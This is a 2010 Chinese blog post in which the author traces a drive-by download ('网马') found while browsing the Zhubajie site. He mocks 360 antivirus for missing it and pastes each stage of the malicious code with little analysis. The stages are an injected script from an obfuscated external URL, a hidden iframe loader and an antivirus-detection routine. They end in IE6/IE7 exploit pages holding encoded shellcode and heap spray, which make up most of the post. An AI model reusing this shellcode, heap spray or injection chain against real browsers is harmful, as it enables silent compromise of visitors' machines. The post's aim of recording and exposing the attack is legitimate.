抓到一只网马,发文顺便鄙视下360

访问猪八戒网抓到一只马儿,具体不清楚是猪八戒被挂马还是内网在arp,

 

由于阿根廷的出局没心情做分析,只贴上马儿的代码做个记录,顺便鄙视下垃圾的360 ,居然没任何反应,

 

----------------------------------以下为简单的追踪马儿以及马儿代码部分

 

访问猪八戒某页面返回信息:

 

1<script language=javascript src= http://z%63C.r%72.%6Eu/tj.js></script>                                                                                                                                                                                                                                 {"t":"0","msg":"<p>\u6b64\u7a3f\u4ef6\u5df2\u7ecf\u4e2d\u6807,\u4e0d\u80fd\u518d\u6295\u7968.<\/p>"}
 

 

追踪http://z%63C.r%72.%6Eu/tj.js   ,鄙视下,连url都搞加密,有个屁用

 

Title
  1. function Get(){
  2. var Then = new Date() 
  3. Then.setTime(Then.getTime() + 12*60*60*1000)
  4. var cookieString = new String(document.cookie)
  5. var cookieHeader = "Cookie1=" 
  6. var beginPosition = cookieString.indexOf(cookieHeader)
  7. if (beginPosition != -1){ 
  8. } else 
  9. {
  10. var bvv="tv";
  11. document.cookie = "Cookie1=cacc;expires="+ Then.toGMTString()
  12. document.write("<div style=\'dispaly:none;\' >");
  13. document.write("<ifra"+"me src=http:\/\/aqe.2288.org\/11\/336fe.htm width=100 height=0><\/iframe>");
  14. document.write("</div>");
  15. }
  16. }Get();
 

 

内嵌了一个网页  ttp:\/\/aqe.2288.org\/11\/336fe.htm  ,继续追踪之


 

Title

  2. <HTML> 
  3. <SCRIPT LANGUAGE="JavaScript"> 
  4. <!-- Hide 
  5. function killErrors() { 
  6. return true; 
  7. }
  8. window.onerror = killErrors;
  9. function jc()
  10. {
  11. jc_list = ['res://C:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123','res://D:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123','res://E:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123','res://C:\\Program%20Files\\360\\360Safe\\safemon\\loadwdui.dll/PNG/130','res://D:\\program%20files\\360safe\\safemon\\loadwdui.dll/PNG/130','res://D:\\360safe\\safemon\\loadwdui.dll/PNG/130','res://C:\\360safe\\safemon\\loadwdui.dll/PNG/130','res://E:\\program%20files\\360safe\\safemon\\loadwdui.dll/PNG/130','res://C:\\program%20files\\360safe\\safemon\\loadwdui.dll/PNG/130','res://D:\\Program%20Files\\360\\360Safe\\safemon\\loadwdui.dll/PNG/130','res://e:\\Program%20Files\\360\\360Safe\\safemon\\loadwdui.dll/PNG/130','res://f:\\Program%20Files\\360\\360Safe\\safemon\\loadwdui.dll/PNG/130'];
  12. for ( i= 0; i<jc_list.length; i++)
  13. {
  14.         ischeck = 1;
  15.         x = new Image();
  16.         x.src = "";
  17.         x.onerror = function()
  18.                 {
  19.                         ischeck = 0;
  20.                 }
  21.         x.src = jc_list[i];
  22.         if (ischeck == 1)
  23.                 return 1;
  24.         delete x;
  25. }
  26. return 0;
  27. }




  32. if (!jc())
  33. {
  34. if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
  35. {
  36. document.write("<EMBED src=iie.swf width=0 height=0>");
  37. }
  38. else
  39. {
  40. document.write("<EMBED src=fff.swf width=0 height=0>");
  41. }
  42. var yaom="bs";
  43. document.writeln("<iframe src=av.htm width=100 height=1><\/iframe>");
  44. }
  45. else
  46. {
  47. document.writeln("<script src=\"2.js\"><\/script>");
  48. }






  55. // --> 
  56. </SCRIPT> 
  57. </HTML> 
  58. <script type="text/javascript" src="http://js.tongji.linezing.com/1241363/tongji.js"></script><noscript><a href="http://www.linezing.com"><img src="http://img.tongji.linezing.com/1241363/tongji.gif"/></a></noscript>
  59.   

   好一个乖乖,一眼居然没看懂,先不管,继续追踪出真实的马儿在说

在看下面又嵌入了:
if (!jc())
{
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<EMBED src=iie.swf width=0 height=0>");
}
else
{
document.write("<EMBED src=fff.swf width=0 height=0>");
}
var yaom="bs";
document.writeln("<iframe src=av.htm width=100 height=1><\/iframe>");
}
else
{
document.writeln("<script src=\"2.js\"><\/script>");
}

swf文件我就不看了,继续看下av.htm 文件, 

 

 

Title
  1. load......
  2. <script> 
  3. if(navigator.userAgent.toLowerCase().indexOf("\x6D\x73"+"\x69\x65\x20\x36")>1)
  4. {
  5. document.write("<iframe width=100 height=1 src=6.htm></iframe>");
  6. }
  7. if(navigator.userAgent.toLowerCase().indexOf("\x6D\x73"+"\x69\x65\x20\x37")>1)
  8. {
  9. document.write("<iframe width=100 height=1 src=7.htm></iframe>");
  10. }

  12. </script>
 

 

马儿终于出来了,继续把2。js文件也看下

 

  1. // JavaScript Document
  2. <!--
  3. var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";

  5. function ext()          //在关闭IE窗口的时候弹出
  6. {
  7. if(window.event.clientY<132 || altKey) iie.launchURL(popURL);
  8. }

  10. function brs()       //插入Object
  11. {
  12. document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>";
  13. }


  16. var popURL = 'safe/360safe.html';    //这里修改成你的退弹网址

  18. eval("window.attachEvent('onload',brs);");
  19. eval("window.attachEvent('onunload',ext);");


  22. //-->
 

 

 这个js应该是在马儿安装后做操作的,反应我很菜,糊涂之下也分析不来, 那就继续把 2只马儿的代码追出来

 

6.htm
<html> 
<body> 
<script> 
var qicheren='\x30';
</script> 
<button id="BIANXINGJINGGANG" onclick="dahuangfeng();" STYLE="DISPLAY:NONE"></button> 
<script src="ie.jpg"></script> 
<script src="iee.jpg"></script> 
<script language="javascript"> 
var dugujiujian = nndx+'%u'+'5858'+'%u5858%u10EB%u4B5B%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%u05EB%uEBE8%uFFFF%u54FF%uBEA3%uBDBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36'+'%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755'+'%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB'+'%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7'+'%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%uDEE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7'+'%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD'+'%uD7BD%uD7B9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1'+'%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD%u36BD%uDDFB'+'%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636'+'%u7D8E%u668E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDED'+'%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD'+'%u34BD%u81FB%u1CD9%uBDB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585'+'%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B55%uBDBD%u7EBD%u1D55%uBDBD%u05BD%uBCAC%u3DB9'+'%uB17F%u55BD%uBD2E%uBDBD%u513C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AD8%u7A76'+'%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7'+'%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8'+'%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405'+'%uBCE2%u7ADB%uB8FA%u5D42%uEE7E%u6136%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593'+'%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286'+'%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E'+jiandao;
         var qingtianzhu = shenzhanshi(dugujiujian);        
         var conglaiyebuqi = new Array()
         var youyitian = 0x86000 - qingtianzhu.length*2;
         var woxinxuelaichao = nicxa+"0c0"+"c"+nicxa+"0c0"+"c";
         var kuaishiyongshuangjiegun = shenzhanshi(woxinxuelaichao);
    
        while(kuaishiyongshuangjiegun.length < youyitian/2) kuaishiyongshuangjiegun +=kuaishiyongshuangjiegun;
         var pp = kuaishiyongshuangjiegun.substring(0, youyitian/2);
         delete kuaishiyongshuangjiegun;
         for(i=0;i<270;i++
         {
              conglaiyebuqi[i] = pp+pp+qingtianzhu;    
         } 

         
function dahuangfeng()
{
    var hongzhizhu = document.createElement("BODY");
    var sa="b";
    hongzhizhu.addBehavior(baibianxionshi);
    var tt="a";
    document.appendChild(hongzhizhu);
    try
    {
        for (i=0;i<10;i++)
         {
           hongzhizhu.setAttribute('s',window);
        }
    }
    catch(e)
    {}
    var a="s";
    window.status+='';
}
document.getElementById("BIANXINGJINGGANG").onclick();
</script> 
</body> 
</html>

 

7.htm
<html> 
<script> 
var qicheren='\x30';
</script> 
<script src="ie.jpg"></script> 
<script src="iee.jpg"></script> 
<script src="ieee.jpg"></script> 
<script language="JavaScript"> 
a=nndx+'%u'+'5858'+'%u5858%u10EB%u4B5B%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%u05EB%uEBE8%uFFFF%u54FF%uBEA3%uBDBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36'+'%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755'+'%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB'+'%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7'+'%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%uDEE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7'+'%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD'+'%uD7BD%uD7B9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1'+'%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD%u36BD%uDDFB'+'%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636'+'%u7D8E%u668E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDED'+'%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD'+'%u34BD%u81FB%u1CD9%uBDB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585'+'%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B55%uBDBD%u7EBD%u1D55%uBDBD%u05BD%uBCAC%u3DB9'+'%uB17F%u55BD%uBD2E%uBDBD%u513C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AD8%u7A76'+'%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7'+'%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8'+'%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405'+'%uBCE2%u7ADB%uB8FA%u5D42%uEE7E%u6136%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593'+'%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286'+'%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E'+jiandao;
sh = shenzhanshi(a);
sz = sh.length * 2;
afandaz = 0x1000000-(sz+0x038);
= "%20c0c%20c0c";

= c.replace(re, "u");
afanda = shenzhanshi(r);

while (afanda.length*2<afandaz) afanda+=afanda;
szhsen = new Array();
for (i=0;i<8;i++)
{          
           szhsen[i] = afanda+sh;
}

CollectGarbage();

</script> 

<script language="JavaScript"> 

var asb = new Array();
for(var i = 0; i < 500; i++) {
        asb.push(document.createElement("img"));
}
  


</script> 
<body onload="test();"></body> 
</html>

 

 还加密的呢,NND,那就先放着,等看完西班牙的比赛,睡一觉了在慢慢给你开刀!

 

 

posted @ 2010-07-04 01:56  lianghugg  阅读(1293)  评论(0编辑  收藏  举报